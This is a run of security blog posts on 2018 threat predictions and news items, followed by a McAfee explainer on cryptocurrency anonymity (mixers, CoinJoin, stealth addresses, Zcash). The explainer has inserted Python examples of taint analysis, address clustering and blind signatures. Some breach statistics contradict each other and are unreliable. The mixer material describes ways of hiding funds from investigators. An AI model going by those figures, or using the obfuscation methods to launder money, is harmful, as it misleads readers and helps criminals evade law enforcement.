Companies have moved to cloud data services faster than anticipated even in traditional industries like banking and healthcare where security is a key concern. As shown in Figure 1, take-up of cloud computing will continue to increase, attaining a compound annual growth rate (CAGR) of 19%, from $99B in 2017 to $117B in 2018.

In 2018, in parallel with the take-up of cloud computing, we’ll see massive cloud data breaches—primarily because companies are not yet fully aware of the complexities involved with securing cloud data.

Figure 1: Rapid Growth of Cloud Computing (Source: IDC)

Data Breaches: A Troubling Past, A Worrying Future

It is estimated that in 2017 alone, over 99 billion records were exposed because of data breaches. Of the various circumstances behind the breaches, hacking of IT systems is by far the most prevalent cause, followed by poor security, inside jobs, and lost or stolen hardware and media.

Major breaches at healthcare and financial services companies indicate a growing trend of vulnerabilities and exploits in these two vital business sectors.

Healthcare was one of the hardest hit sectors in 2017, and that trend is expected to worsen in the coming year. Some 31 million records were stolen, accounting for 2% of the total and up a whopping 423% from just 6 million.

The financial services industry is the most popular target for cyber attackers (see Figure 2), and this dubious distinction is likely to continue in the upcoming year. Finance companies suffered 125 data breaches, 14% of the total, up 29% from the previous six months.

Data breaches in various other industries totaled 53, up 13% and accounting for 6% of the total. The number of records involved in these attacks was a staggering 1.34 billion (71% of the total) and significantly up from 14 million.

It is estimated that the average cost of a data breach will be over $150 million by 2020, with the global annual cost forecast to be $2.1 trillion.

Figure 2: Data Records Stolen or Lost by Sector (Source: IDC)

Critical Cloud-based Security Misconfigurations

Missteps in cloud-based security configurations often lead to data breaches. This is likely to increase as more organizations move some or most of their operations to the cloud.

As organizations and business units migrate to public cloud services, centralized IT departments will find it increasingly difficult to control their company’s IT infrastructure. These enterprises lack the visibility necessary to manage their cloud environments and don’t have the monitoring tools to detect and report on security governance and compliance. Many are not even aware of the specific workloads they’ve migrated to the cloud. And without a doubt, you can’t secure what you can’t see.

For example, an unsecured Amazon Web Services S3 storage bucket has been an ongoing concern for cloud users. The bucket, which can be configured to allow public access, has in the past leaked highly sensitive information. In one instance of a major security breach, a whopping 111 GB worth was exposed, affecting tens of thousands of consumers.

Most significantly, Amazon is aware of the security issue, but is not likely to mitigate it since it is caused by cloud-user misconfigurations.

2. Cryptocurrency Mining

We expect to see a growth of cryptocurrency mining attacks where attackers are utilizing endpoint resources (CPU/GPU) to mine cryptocurrency either by cross-site scripting (XSS) or by malware. It’s increasingly likely that remotely vulnerable/hackable IoT devices will also be used as a mining force to further maximize an attacker’s profits.

Illegal mining operations set up by insiders, which can be difficult to detect, are also on the rise—often carried out by employees with high-level network privileges and the technical skills needed to turn their company’s computing infrastructure into a currency mint.

These attacks will quickly grow in popularity given their lucrative nature. As long as there is a potential windfall involved, such inside jobs are likely to remain high on the list of cybersecurity challenges faced by companies.

Although attacks that attempt to embed crypto-mining malware are currently unsophisticated, we expect to see an increase in the sophistication of attacks as word gets out that this is a lucrative enterprise. We also expect these attacks to target higher-traffic websites, since the potential to profit increases greatly with higher numbers of concurrent site visitors.

3. Malicious Use of AI/Deception of AI Systems

The malicious use of artificial intelligence (AI) will continue to grow quickly. The industry has started to see early traces of attackers leveraging AI to learn normal behavior and mimic that behavior to bypass current user and entity behavior analytics (UEBA) solutions. It’s still very early stage and will continue to mature beyond 2018. However, it will force current UEBA vendors to come up with a 2.0 approach to identifying anomalous behavior.

AI and internet of things (IoT) use cases drive cloud adoption. Artificial intelligence in the cloud promises to be the next great disrupter as computing is evolving from a mobile-first to an artificial intelligence-first model. The proliferation of cloud-based IoT in the marketplace continues to drive cloud demand, as cloud allows for secure storage of massive amounts of structured and unstructured data central to IoT core functions.

Without proper awareness and security measures, AI can be easily fooled by adversarial behavior. In 2018 we will see more:

  • Attacks on AI systems (for example, self-driving cars)
  • Cyber attackers who adapt their attacks to bypass AI-based cybersecurity systems

4. Cyber Extortion Targets Business Disruption

Cyber extortion will be more disruption focused. Encryption, corruption, and exfiltration will still be the leaders in cyber extortion, but disruption will intensify this year, manifesting in disabled networks, internal network denials of service, and crashing email services.

In the last few years, attackers have adopted a “traditional” ransomware business model—encrypt, corrupt or exfiltrate the data and extort the owner in order to recover the data or prevent it from leaking. Fortunately, techniques such as deception or machine learning have helped to prevent these types of attacks and made it more difficult for attackers to successfully complete a ransomware attack.

From a cost perspective, most of the damage associated with ransomware attacks is not the data loss itself, since many firms have backups, but the downtime. In the case of ransomware, attackers will increasingly leverage a disrupt-and-extort method. DDoS is the classic and most familiar one, but attackers will probably adopt new techniques. Examples include shutting down an internal network (web app to a database, point-of-sale systems, communication between endpoints, etc.), modifying computer configuration to cause software errors, causing software crashes, system restarts, disruption of your corporate email or disruption of any other infrastructure which is mandatory for an organization’s employees’ and/or customers’ day-to-day functions. Basically, any event that leaves the company unable to conduct business.

While absolute protection is impossible, you can help lower your chance of business interruption due to a cyber-attack. Start by creating a formal, documented risk management plan that addresses the scope, roles, responsibilities, compliance criteria and methodology for performing cyber risk assessments. This plan should include a characterization of all systems used at the organization based on their functions, the data they store and process, and their importance to the organization.

5. Breach by Insiders

Businesses are relying more on data which means more people within the business have access to it. The result is a corresponding increase in data breaches by insiders either through intentional (stealing) or unintentional (negligent) behavior of employees and partners.

While the most sensational headlines typically involve infiltrating an ironclad security system or an enormous and well-funded team of insurgents, the truth of how hackers are able to penetrate your system is more boring: it’s your employees.

A new IT security report paints a bleak picture of the actual gravity of the situation. Researchers found that IT workers in the government sector overwhelmingly think that employees are actually the biggest threat to cybersecurity. In fact, 100% of respondents said so.

Fortunately, security-focused companies have begun identifying these traditionally difficult to detect breaches using data monitoring, analytics, and expertise. The difference being that in 2018, more companies will invest in technology to identify this behavior where previously they were blind.

In fact, 75% of IT employees in government reported that rather than their organization having dedicated cybersecurity personnel on staff (which is becoming more and more necessary with each passing year), an overworked IT team was left to deal with security and employee compliance. As a result, 57% reported that they didn’t even have enough time to implement stronger security measures while 54% cited too small of a budget.

Here’s another fact for you: insider threats are the cause of the biggest security breaches out there, and they are very costly to remediate. According to a 2017 Insider Threat Report, 53% of companies estimate remediation costs of $100,000 and more, with 12% estimating a cost of more than $1 million. The same report suggests that 74% of companies feel that they are vulnerable to insider threats, with seven percent reporting extreme vulnerability.

These are the steps every company should take to minimize insider threats:

  • Background checks
  • Watch employee behavior
  • Use the principle of least privilege
  • Control user access
  • Monitor user actions
  • Educate employees

Insider threats are one of the top cybersecurity threats and a force to be reckoned with. Every company will face insider-related breaches sooner or later regardless of whether it is caused by a malicious action or an honest mistake. And it’s much better to put the necessary security measures in place now than to spend millions of dollars later.


Join Imperva on January 23rd for a live webinar where we’ll discuss these trends in more detail and review the security measures necessary to mitigate the risks. Register to attend today.

North Korea hackers steal bitcoin by targeting currency insiders

Bitcoin values are skyrocketing, and North Korea appears to be trying to profit from that virtual gold rush. Secureworks reports that the Lazarus Group (a team linked to the North Korean government) has been conducting a spearphishing campaign against cryptocurrency industry workers in a bid to steal bitcoin. The attacks have tried to trick workers into compromising their computers by including a seemingly innocuous Word file that claims they need to enable editing to see the document. If they fell prey, it installed a rogue macro that quietly loaded a PC-hijacking trojan while staffers were busy looking at the bogus document.

Source: ZDNet, Reuters

Cryptocurrency in kilowatt hours: Counting the costs of anonymous transactions

The energy costs are not the only charges in a transaction: the bitcoin network itself levies a charge which, according to a blog from Valve, the gaming provider behind the Steam network, has skyrocketed from $0.20 in 2016 to $20 per transaction today.

The post Cryptocurrency in kilowatt hours: Counting the costs of anonymous transactions appeared first on WeLiveSecurity

Staying Anonymous on the Blockchain: Concerns and Techniques

With Bitcoin at one point valued at more than $5,000 per unit, cryptocurrencies have excited a lot of interest from individuals, businesses, and hackers. One of the selling points of Bitcoin and others of its type is anonymity. Yet there are concerns that online currency transactions may not be as anonymous as many wish. In this post, we will discuss several tools that make an effort to ensure anonymity with cryptocurrency transactions.

A cryptocurrency is a digital currency in which encryption techniques regulate the generation of units of currency and verify the transfer of funds, and that operates independently of a central bank. In other words, it is a decentralized, trustless money system that can be verified independent of any central authority. It does this using a “blockchain,” a list of open yet encrypted records.

There are several flavors of cryptocurrencies, with Bitcoin, Litecoin, and Ethereum the most widely used. Cryptocurrencies released after the success of Bitcoin are collectively called altcoins. The father of all cryptocurrencies, Bitcoin requires the ledger, or record of transactions, to be available to everyone—making all transactions public knowledge. For many, this raises anonymity and privacy concerns. In this article, we will examine some of the ways that the anonymity of cryptocurrencies has been addressed.

Because a blockchain ledger is public, maintaining anonymity is hard, especially in the case of Bitcoin. Bitcoin is considered pseudonymous, which means a person may be linked to a public Bitcoin address, but not to an actual name or home address. You may know that an address is related to one person but you do not know to whom. Hence, Bitcoin (and most cryptocurrencies) are not completely anonymous. Many people trading in cryptocurrency prefer their transactions to be anonymous for various reasons. These include, but are not limited to, law enforcement–related issues, company-specific information, or simply maintaining privacy. In the hacker world, cryptocurrencies have become ubiquitous in financial transactions. Well-known underground markets that sell stolen personal data, malware, and other goods and services deal exclusively in cryptocurrencies.

Figure 1: The AlphaBay market, which was seized by law enforcement.

Primarily, these markets deal in Bitcoin, as was the case with the recently seized Hansa and AlphaBay markets. Other currencies are also being used and implemented in these markets. According to the European Cybercrime Centre Internet Organised Crime Threat Assessment report, many markets, including automated vending card sites, deal almost exclusively in Bitcoins. However, the report acknowledges that Monero, Ethereum, and Zcash are also gaining traction in these circles. It also notes the development of a new dark-net market called Tralfamadore, which uses Ethereum smart contracts as a possible new crime-as-a-service model.

Cryptocurrencies are not limited to markets. Extortion attempts through ransomware demand cryptocurrencies as payment. All the modern major ransomware families—such as Locky, Petya, and WannaCry—have demanded Bitcoin for payments. To protect proprietary information, among other reasons, those engaged in cybercrime and those who investigate these crimes have an incentive to maintain anonymity.

Maintaining anonymity can be difficult because of mistakes or attacks against the network designed to deanonymize users. Compromised identities can hinder law enforcement investigations or, in the case of cybercriminals, lead to arrest. Because the ledger is publicly visible, anyone can analyze it to correlate addresses with identifiable names. If they are successful, they can link all transactions to a payer or payee. The attacker can then move to corresponding Bitcoin addresses and perform a “taint” analysis. In Bitcoin jargon, the “taint” of a Bitcoin transaction evaluates the association between an address and earlier transaction addresses. The more taint, the stronger the link between two addresses. Hence the need for various techniques to maintain anonymity.
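To make the taint calculation concrete, here is an added worked example in Python (not from the page or from any blockchain-analysis product) over a small constructed ledger. It uses the value-weighted mixing model: an origin output is fully tainted if it pays the source address, every output of a later transaction inherits the input-value-weighted average taint of the outputs that transaction spends, and an address's taint is the value-weighted average over all outputs it ever received. Transaction ids, addresses and amounts are constructed; fees are ignored.

```python
"""Value-weighted taint analysis over a constructed ledger (added example)."""
from collections import defaultdict

# Constructed ledger. Each entry: (txid, inputs, outputs).
#   inputs  -> list of (prev_txid, vout) references to earlier outputs;
#              an empty list marks an origin (coinbase-style) transaction.
#   outputs -> list of (address, value).
LEDGER = [
    ("cb1", [], [("S", 10.0)]),                       # origin funds to address S
    ("cb2", [], [("B", 10.0)]),                       # origin funds to unrelated B
    ("t1", [("cb1", 0)], [("A1", 6.0), ("S", 4.0)]),  # S pays A1, change back to S
    ("t2", [("t1", 0), ("cb2", 0)], [("M", 16.0)]),   # A1 and B jointly pay M
    ("t3", [("t2", 0)], [("C", 16.0)]),               # M forwards everything to C
]


def output_taints(ledger, source):
    """Taint of every transaction output with respect to `source`.

    Returns ({(txid, vout): taint}, {(txid, vout): (address, value)}).
    An origin output is fully tainted (1.0) if it pays `source`, else 0.0.
    Any other transaction's taint is the input-value-weighted average of the
    spent outputs' taints, and every output of that transaction inherits it.
    """
    outputs = {}   # (txid, vout) -> (address, value)
    taint = {}     # (txid, vout) -> taint in [0, 1]
    for txid, inputs, outs in ledger:
        if inputs:
            total = sum(outputs[ref][1] for ref in inputs)
            tx_taint = sum(outputs[ref][1] * taint[ref] for ref in inputs) / total
        else:
            tx_taint = None
        for vout, (addr, value) in enumerate(outs):
            ref = (txid, vout)
            outputs[ref] = (addr, value)
            if tx_taint is None:
                taint[ref] = 1.0 if addr == source else 0.0
            else:
                taint[ref] = tx_taint
    return taint, outputs


def address_taints(ledger, source):
    """Value-weighted average taint of all outputs each address ever received."""
    taint, outputs = output_taints(ledger, source)
    received = defaultdict(lambda: [0.0, 0.0])  # addr -> [tainted value, total value]
    for ref, (addr, value) in outputs.items():
        received[addr][0] += value * taint[ref]
        received[addr][1] += value
    return {addr: tainted / total for addr, (tainted, total) in received.items()}


def linked_addresses(ledger, source, threshold=0.25):
    """Addresses other than `source` whose taint reaches the threshold, strongest first."""
    taints = address_taints(ledger, source)
    hits = [(addr, t) for addr, t in taints.items() if addr != source and t >= threshold]
    return sorted(hits, key=lambda item: -item[1])


if __name__ == "__main__":
    for addr, t in sorted(address_taints(LEDGER, "S").items()):
        print(f"{addr}: taint from S = {t:.3f}")
    print("linked to S:", linked_addresses(LEDGER, "S"))
```

On this ledger A1 is fully tainted by S, while M and C carry a taint of 0.375 because only 6 of the 16 coins that reached M came through S's chain; B, which never touched S's funds, stays at zero. The threshold in `linked_addresses` is the analyst's knob: lower it and more addresses count as "associated", which is exactly the pressure the mixing techniques below are meant to relieve.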

A deceptively simple technique is to refrain from giving out personally identifiable information. Users can avoid linking their personal data or organizational information to the cryptocurrency address or transaction. A website generally carries personal data such as an IP address and registrar information that give context to the address if it is used in relation to the site or service. Another easy and obvious way to maintain anonymity is to trade Bitcoins for cash.

Anonymity is based on the trust of the person or organization you are trading with and how securely they store the information. Most law-abiding users may feel comfortable using ATMs and even wallets with built-in features for in-person exchanges, such as the BillBoard feature of Mycelium. However, some local laws view in-person cash transactions as evidence of money laundering, which can lead to arrest depending on the amount transferred.

Beyond simple user-behavior changes, many technologies help secure anonymity for cryptocurrency users. We will delve into several techniques:

  • Services such as virtual private networks (VPNs) or Tor
  • New Bitcoin addresses for each transaction
  • Tumblers/mixers
  • CoinJoin
  • Secure wallets
  • Stealth addresses
  • TumbleBit
  • CryptoNote
  • Zcash or other anonymity-centric cryptocurrencies

Services such as VPNs or Tor

Both VPN and Tor services are designed to safeguard the user and can be used to maintain anonymity. These technologies are used by researchers, journalists, companies, governments, and others for both safety and privacy, and by many cryptocurrency users with similar concerns. Many ransomware decryption-management tools are hosted as hidden services on Tor. VPNs are often used to hide personal information during cryptocurrency transaction requests. Both VPN and Tor can hide the personal data of the user making a transaction by presenting a different IP address or geolocation, sometimes configurable by the user. These tools prevent an attacker or analyst who is monitoring traffic from correlating IP addresses with transactions. They can also be used when communicating with others, such as vendors, to hide your address from them as well.

Figure 2: The onion router network.

Tor is free software that enables anonymity in online transactions by “onion routing,” an encryption technique in the application layer that essentially masks IP addresses. It does this routing through hops, similar to layers of an onion, multiple times over a virtual network, making it hard for any member of the hops to decrypt information. Using Tor can slow Bitcoin transactions but it can keep the user’s address hidden.

A VPN helps add security to a network by using secure protocols such as PPTP, L2TP, or OpenVPN to encapsulate online transactions. A user trading in Bitcoins can use a VPN to appear to work from San Francisco while actually working from Germany. The data is encrypted from the user to the VPN service, hiding traffic from their ISP, and preventing correlating traffic analysis of transactions.

New Bitcoin Addresses for Each Transaction

The blockchain is effectively immutable, provided that 50% or more of the network is not working together to make changes, so all transactions can be traced back to their inception. For users who use a different address for each transaction, it becomes difficult to prove associations between the addresses. By reusing addresses, however, the connection is inherently known: any third party can easily follow transactions to and from that address, and the user's behavior is easy to trace. Should their identity become associated with their addresses, further analysis of its context may lead to the discovery of other related addresses used by the same user. By using unique addresses for each transaction, users increase the difficulty of finding relationships among the transactions. Using a single address per transaction is the recommended practice from Satoshi Nakamoto’s original paper.

Tumblers/Mixers

The terms tumblers and mixers are often used interchangeably. They are services that help confuse the trail of cryptocurrency transactions by associating unrelated funds together using various methods.

If an address’s anonymity has been compromised, or in other words has been tainted, the funds can be “cleaned” using a tumbler. To do this, users send the Bitcoins they want to “clean” to the tumbler, which mixes them with Bitcoins from other users in a pool and then returns the currency to their respective owners at new addresses, minus a mixing fee. The association between the user’s identity and the new addresses is muddled, providing a fresh start to anonymity. The mixer cannot undo any information gained prior to the mix.

There are two types of mixers, centralized and decentralized. Popular centralized mixers are Bitmixer.IO (in use since 2011), Bitcoin Fog (since 2011, under Tor), and Helix. Decentralized mixers achieve the same mixing goals without a central authority controlling the mixing. Examples of decentralized Bitcoin mixers are CoinShuffle, JoinMarket, SharedCoin, and Jumblr. This technique is obviously of interest to money launderers, and Bitcoin Fog appears to focus on those users. Mixing services are seen to have a lot of privacy and anonymity value by other coin developers and have benefited from a lot of recent research and implementations. New or proposed coin implementations such as Cloakcoin, Dash (through PrivateSend), PIVX, and Zcoin have built-in mixing services as part of their blockchain networks.

Figure 3: Bitcoin Fog, a Bitcoin mixer.

CoinJoin

The back-end technology of decentralized mixers is typically the widely used technology CoinJoin, which was proposed in 2013 by Gregory Maxwell. The basic concept groups a bunch of payers, pools their money, and makes a joint payment, thus obfuscating the relationship between payer and payee. What makes CoinJoin possible is that not every input in a transaction must come from the same wallet or user. The signatures required to authenticate a transaction are independent for each input, allowing multiple users to agree to complete a single transaction to multiple unrelated payees. In doing so, the information about which input paid which payee is not part of the blockchain, and can be hidden from analysis.

CoinJoin is an important technology for maintaining anonymity because it is the base of many techniques and implementations. Some implementations include SharedCoin, Darkwallet, CoinShuffle, PrivateSend, and JoinMarket.
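The two points above, address reuse and CoinJoin, can be seen together in an analyst's clustering pass. This added example (not code from the post) runs the common-input-ownership heuristic over a constructed set of transactions: reusing address A1 links A3 to A2 even though they never co-spent, and a CoinJoin-style transaction must be excluded or the heuristic wrongly merges users A and B. The transactions, addresses and CoinJoin heuristic are all constructed for illustration.

```python
from collections import Counter

# Constructed sample transactions: "in" lists the spent addresses, "out" lists
# (address, amount) pairs. Amounts are illustrative, not real chain data.
TXS = [
    {"in": ["A1", "A2"], "out": [("M1", 1.5), ("A3", 0.4)]},  # user A co-spends A1 and A2
    {"in": ["A3", "A1"], "out": [("M2", 0.4)]},               # user A reuses A1 alongside A3
    {"in": ["B1"],       "out": [("M3", 2.0)]},               # unrelated user B
    {"in": ["A1", "B1"], "out": [("X1", 0.5), ("Y1", 0.5),    # CoinJoin-style joint payment
                                 ("A4", 0.2), ("B2", 0.3)]},
]

class DisjointSet:
    def __init__(self):
        self.parent = {}

    def find(self, x):
        self.parent.setdefault(x, x)
        while self.parent[x] != x:
            self.parent[x] = self.parent[self.parent[x]]  # path halving
            x = self.parent[x]
        return x

    def union(self, x, y):
        self.parent[self.find(x)] = self.find(y)

def looks_like_coinjoin(tx):
    # simple heuristic: several inputs and at least two outputs of identical value
    amounts = Counter(amount for _, amount in tx["out"])
    return len(tx["in"]) > 1 and max(amounts.values()) >= 2

def cluster(txs, skip_coinjoin=True):
    """Common-input-ownership heuristic: inputs spent together share an owner."""
    ds = DisjointSet()
    for tx in txs:
        if skip_coinjoin and looks_like_coinjoin(tx):
            continue  # joint payment: its inputs belong to different people
        for addr in tx["in"]:
            ds.union(tx["in"][0], addr)
    groups = {}
    for addr in list(ds.parent):
        groups.setdefault(ds.find(addr), set()).add(addr)
    return sorted(groups.values(), key=lambda s: sorted(s))
```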


Figure 4: A CoinJoin example. Source: Wikipedia.

Secure Wallets

Bitcoin wallets contain a private key that provides ownership and access to the wallets’ funds. They generate addresses and sign their transactions, proving ownership to the blockchain network. If a private key is compromised, any address generated by that private key will be compromised as well, along with any funds that those addresses may hold. Users are strongly advised to protect their private keys through secure wallets. Broadly speaking, there are five types of wallets: desktop, mobile, web, paper, and hardware. Among the different types some, such as Darkwallet, also focus on user anonymity. Darkwallet primarily provides anonymity using two techniques: stealth addresses and CoinJoin. By implementing several anonymity techniques and providing a mechanism for users to join in CoinJoin transactions, wallets simplify the process. Darkwallet is still in open beta, and it is unclear how active the project is.


Figure 5: Darkwallet.

Stealth Addresses

Stealth addresses facilitate transactions in which a requester wishes to ask the public for funds yet keep their balance hidden. The requester publishes a stealth address that payers use to generate a regular, one-time payment address. Using cryptographic techniques, every address generated from the stealth address is controlled by the requester’s private key. With this technique, the payment addresses are not publicly associated with the receiver, preventing analysts from tracking the ownership of funds.

Stealth addresses work using the elliptic curve Diffie-Hellman algorithm. This is the idea behind Monero, which inherently supports stealth addresses. This privacy feature is attractive to many customers in the digital currency market. However, it can be applied to other currencies, too, including Bitcoin. For example, Darkwallet uses stealth addresses as one feature to provide anonymity within Bitcoin transactions.

TumbleBit

TumbleBit is a new protocol that can be used with Bitcoin to make transactions off the blockchain via an untrusted intermediary party. It is essentially a trustless mixing system using the blind-signing features of Chaumian e-cash. To keep the mixer from linking the payer and payee, the system uses a pool of funds that are indistinguishable from each other. The pool is populated by the senders, who send a “blinded” serial number to the mixer, which signs it. Based on the properties of blind signing, any signed serial number can be unblinded and still carry a valid signature. This serial can be sent to the recipient, who can redeem the associated funds. The mixer does not know which funds are associated with the signed serial number and deducts the appropriate amount from the pool. When a large number of similar input and output addresses are mixed in, it is hard for the mixer to map transactions to the payer and payee, even with extensive analysis.

Figure 6: TumbleBit.

It takes a three-phased approach to complete payments. In the first phase, escrow, Party A notifies the tumbler that they would like to make a payment, and Party B notifies the tumbler that they would like to be paid. This is done on the public blockchain. For the second phase, the researchers have put cryptographic tools into place that allow the tumbler to pay the correct parties without actually knowing which parties are involved. This is the blind-signing technique. Phase two does not appear on the blockchain, providing additional benefits such as faster transactions. In the third phase, cashout, all of the transactions are conducted simultaneously, making it more difficult to identify which parties are involved in any specific transaction. Phase three does appear in the public blockchain.
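The blind-signing step in phase two, as an added example that is not TumbleBit's own code (TumbleBit's real construction is more involved): a Chaumian RSA blind signature in which the tumbler signs a value it cannot read, the payee unblinds it into a valid signature on the serial, and the tumbler's own log of what it signed never matches what is later redeemed. The RSA key uses Mersenne primes so the block is self-contained; it is trivially factorable and is a constructed toy parameter, not a usable key.

```python
import hashlib
import math
import secrets

# Toy RSA key for the tumbler (constructed). Mersenne primes make the modulus
# trivially factorable; they only keep the example dependency-free.
RSA_P, RSA_Q = 2**127 - 1, 2**521 - 1
RSA_N, RSA_E = RSA_P * RSA_Q, 65537
RSA_D = pow(RSA_E, -1, (RSA_P - 1) * (RSA_Q - 1))

def serial_to_int(serial: bytes) -> int:
    # the serial is hashed so the tumbler signs a fixed-size value below the modulus
    return int.from_bytes(hashlib.sha256(serial).digest(), "big")

def blind(m, n=RSA_N, e=RSA_E):
    # payer multiplies by r^e; only the payer ever knows r
    while True:
        r = secrets.randbelow(n - 2) + 2
        if math.gcd(r, n) == 1:
            return (m * pow(r, e, n)) % n, r

def unblind(blinded_sig, r, n=RSA_N):
    # (m * r^e)^d = m^d * r mod n, so dividing by r leaves a plain signature on m
    return (blinded_sig * pow(r, -1, n)) % n

def verify(m, sig, n=RSA_N, e=RSA_E):
    return pow(sig, e, n) == m

class Tumbler:
    def __init__(self):
        self.seen_blinded = []   # everything the tumbler sees at signing time
        self.redeemed = set()    # serials already cashed out

    def sign_blinded(self, blinded):
        self.seen_blinded.append(blinded)
        return pow(blinded, RSA_D, RSA_N)

    def redeem(self, serial, sig):
        # payee presents the unblinded serial; reject forgeries and double-spends
        if serial in self.redeemed or not verify(serial_to_int(serial), sig):
            return False
        self.redeemed.add(serial)
        return True

def can_link(tumbler, serial):
    # the signing log holds only blinded values, so the redeemed serial is absent
    return serial_to_int(serial) in tumbler.seen_blinded
```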

CryptoNote

A ring signature is a type of digital signature that allows one person in a group to endorse the signature on behalf of the group. This step provides more security by making it computationally hard to determine which of the group members’ keys was used to produce the signature. CryptoNote uses ring signatures to produce untraceable payments and is implemented in cryptocurrencies such as Monero. CryptoNote makes it almost impossible for the verifier of the payment to identify the payee from the group.

Figure 7: A ring signature.

CryptoNote uses a modified version of the Diffie-Hellman exchange protocol, which allows two parties to produce a common secret key derived from their public keys. In some implementations, the sender uses the receiver’s public address and random data generated by the sender to create a one-time key for the payment. Because the keys are generated dynamically and are random, they are called one-time keys. A ring signature also can transform traceability into linkability, which is supported by using a key image through which it is impossible to recover the private key. The key image is a one-way function that acts as an anonymous marker for the user’s private key.

Zcash or Other Anonymity-Centric Cryptocurrencies

Some cryptocurrencies were developed with anonymity as a primary goal. Monero, as well as Dash, Zcash, and others, are among them. Each implements different techniques to hide the identity of its users. We will look at just Zcash, but there are many alternatives with many approaches.

Zcash is a proof-of-work cryptocurrency and is considered the first truly anonymous digital currency. Zcash also uses a decentralized approach on the blockchain; however, users can encrypt all transactions on the blockchain, making it hard for anybody on the network to access the details. Zcash uses zk-SNARKs (zero-knowledge succinct non-interactive arguments of knowledge) to facilitate the encryption. Moreover, the only information that is available on the blockchain is the timestamp of transactions. Zcash is regarded as a privacy-enabling cryptocurrency, and most people agree it is also anonymous. Users are free to use two kinds of addresses: transparent addresses, which start with a “t” and make trades similar to those in Bitcoin, and shielded addresses, which start with “z” and use zero-knowledge proofs to maintain privacy.


Figure 8: Zcash.


Many of the technologies and techniques for maintaining anonymity have grown from mathematicians, technologists, and enthusiastic cryptocurrency researchers, who have made many advancements and put their findings to practical use. Although there are valid reasons to seek anonymity, in the hands of bad actors these techniques make activity difficult for law enforcement and security researchers to analyze. Regardless of the motivations, many users try to maintain anonymity while using cryptocurrencies. There are several options, some of which can be combined for further security. A few techniques are simple, while others require specialized tools.

In future posts, we will cover some of the tools and techniques used to break the anonymity of users of cryptocurrencies.


For more insights and research follow us at @McAfee_Labs.

The post Staying Anonymous on the Blockchain: Concerns and Techniques appeared first on McAfee Blogs.